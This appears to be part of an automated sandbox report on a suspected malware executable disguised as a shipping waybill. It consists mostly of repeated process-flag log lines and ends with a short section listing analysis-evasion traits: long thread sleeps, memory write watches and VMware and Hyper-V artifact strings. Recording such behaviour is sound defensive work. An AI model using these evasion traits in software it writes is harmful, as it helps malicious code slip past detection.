                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Source: Yara matchFile source: Process Memory Space: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe PID: 5516, type: MEMORYSTR
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeMemory allocated: 2E30000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeMemory allocated: 30C0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeMemory allocated: 2FD0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeMemory allocated: 94A0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeMemory allocated: 7DA0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeMemory allocated: A4A0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeMemory allocated: B4A0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeMemory allocated: BA70000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeMemory allocated: CA70000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe TID: 6804Thread sleep time: -780000s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeCode function: 3_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,3_2_00403D74
                        Source: C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeThread delayed: delay time: 60000Jump to behavior
                        Source: Amcache.hve.6.drBinary or memory string: VMware
                        Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
                        Source: Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe, 00000003.00000002.2873103232.0000000000FC8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllZ
                        Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin
                        Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.
                        Source: Amcache.hve.6.drBinary or memory string: VMware20,1hbin@
                        Source: Amcache.hve.6.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
